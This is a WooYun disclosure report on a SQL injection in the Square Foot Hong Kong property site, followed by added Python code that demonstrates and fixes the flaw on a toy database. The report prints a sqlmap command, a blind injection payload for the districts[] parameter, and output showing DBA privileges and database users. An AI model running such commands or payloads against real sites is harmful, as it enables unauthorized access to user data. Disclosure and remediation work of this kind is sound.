Vulnerability summary
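Vulnerability title: SQL injection at a point in Square Foot online (DBA privileges; root password leaked; tens of millions of site records leaked; large numbers of user passwords leaked) (Hong Kong region)
Submitted: 2015-11-11 10:10
Fixed: 2016-01-11 15:32
Disclosed: 2016-01-11 15:32
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 10
Vulnerability status: Handed over to a third-party partner organization (hkcert, Hong Kong Computer Emergency Response Team Coordination Centre) for handling
Tags: none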
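Vulnerability details
Disclosure status:
2015-11-11: Details sent to the vendor; awaiting vendor handling
2015-11-20: Vendor confirmed; details disclosed to the vendor only
2015-11-30: Details disclosed to core white hats and experts in related fields
2015-12-10: Details disclosed to regular white hats
2015-12-20: Details disclosed to trainee white hats
2016-01-11: Details disclosed to the public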
Brief description: Square Foot online is an independent website, promoting and showcasing properties for sale and rent from Hong Kong's leading independent real estate agents. The aim of squarefoot.com.hk is to ensure that a property is given the most effective exposure to sell or let as quickly as possible, using a coherent and user friendly online platform. The website is home to the leading industry real estate agents, who actively upload their property listings in the Hong Kong and international property sections. The property listings are regularly monitored to ensure that the end user is privy to the most up to date and accurate database of properties available in this market. squarefoot.com.hk is a leading media brand in Hong Kong that focuses on all property related matters, and targeted towards the English-reading population of Hong Kong, both expatriate and Asian. If you are selling or letting your home, ask your property agent to advertise your property on squarefoot.com.hk. It's convenient, easy-to-use and an effective means to display your property to a mass audience, both inside and outside of Hong Kong. If you are interested in advertising on our website, please contact us for our competitive rates and more information on +852 3965 4300 or email [email protected] . In addition, we welcome any feedback that you may have to help us constantly improve our site. Thank you. Read more at http://www.squarefoot.com.hk/section/about-us/#I31PrcIxGfytVlV3.99
Detailed description: Address: http://**.**.**.**/chinese-hk/serviced-apartments/?area=1&districts[]=95&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B
python sqlmap.py -u "http://**.**.**.**/chinese-hk/serviced-apartments/?area=1&districts[]=95&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B" -p districts[] --technique=BT --random-agent --batch --count --search -C pass
Database: sf-www
+------------------------+----------+
| Table                  | Entries  |
+------------------------+----------+
| sqft_xml_record_detail | 39164263 |
| sqft_xml_record        | 24016093 |
Proof of vulnerability:
---
Parameter: districts[] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: area=1&districts[]=95) AND 3345=3345 AND (3668=3668&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL >= 5.0.0
current user: 'sf-www@%'
current user is DBA: True
database management system users [4]:
[*] 'munin'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'sf-www'@'%'
Fix:
Copyright notice: Please credit the source when reposting. 路人甲 @乌云 (WooYun)
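The `districts[]` finding above, as an added example that is not part of the original report and is not the site's code: the closing parenthesis in the reported payload suggests the value is concatenated into an `IN (...)` list, which is assumed here. Python with an in-memory SQLite table stands in for the PHP/MySQL application; the table, rows and function names are constructed for illustration.

```python
import re
import sqlite3

# Value of districts[] as shown in the report's sqlmap output.
REPORTED_VALUE = "95) AND 3345=3345 AND (3668=3668"
# Constructed false twin: same shape, but the condition can never hold.
FALSE_TWIN = "95) AND 3345=3346 AND (3668=3668"


def make_db():
    """In-memory table with constructed rows (not data from the site)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE apartments (id INTEGER PRIMARY KEY, district_id INTEGER, name TEXT)")
    db.executemany(
        "INSERT INTO apartments (district_id, name) VALUES (?, ?)",
        [(95, "A"), (95, "B"), (12, "C"), (40, "D")],
    )
    return db


def search_vulnerable(db, districts):
    """Assumed flaw: request values are pasted into the IN (...) list as text."""
    sql = "SELECT name FROM apartments WHERE district_id IN (%s) ORDER BY id" % ",".join(districts)
    return [row[0] for row in db.execute(sql)]


def parse_district_ids(values, max_ids=50):
    """Allow-list: each value must be 1-9 ASCII digits; cap the list length."""
    if len(values) > max_ids:
        raise ValueError("too many district ids")
    ids = []
    for value in values:
        if not re.fullmatch(r"[0-9]{1,9}", value):
            raise ValueError("district id is not an integer: %r" % value)
        ids.append(int(value))
    return ids


def search_hardened(db, districts):
    """Validate first, then bind every id through a placeholder."""
    ids = parse_district_ids(districts)
    if not ids:
        return []  # an empty IN () list is a syntax error in MySQL
    placeholders = ",".join("?" for _ in ids)
    sql = "SELECT name FROM apartments WHERE district_id IN (%s) ORDER BY id" % placeholders
    return [row[0] for row in db.execute(sql, ids)]


def oracle_visible(db):
    """True when the true/false twins return different results (the blind signal)."""
    return search_vulnerable(db, [REPORTED_VALUE]) != search_vulnerable(db, [FALSE_TWIN])


if __name__ == "__main__":
    db = make_db()
    print("baseline        :", search_vulnerable(db, ["95"]))
    print("reported value  :", search_vulnerable(db, [REPORTED_VALUE]))
    print("false twin      :", search_vulnerable(db, [FALSE_TWIN]))
    print("hardened, valid :", search_hardened(db, ["95", "12"]))
    try:
        search_hardened(db, [REPORTED_VALUE])
    except ValueError as exc:
        print("hardened, bad   :", exc)
```

Binding the ids closes the injection point. The `current user is DBA: True` line in the report is a separate least-privilege problem that binding does not change.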
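Vulnerability response
Vendor response: Severity: High
Vulnerability Rank: 13
Confirmed: 2015-11-20 16:24
Vendor reply: The vulnerability has been reported to the website's contact person.
Latest status: None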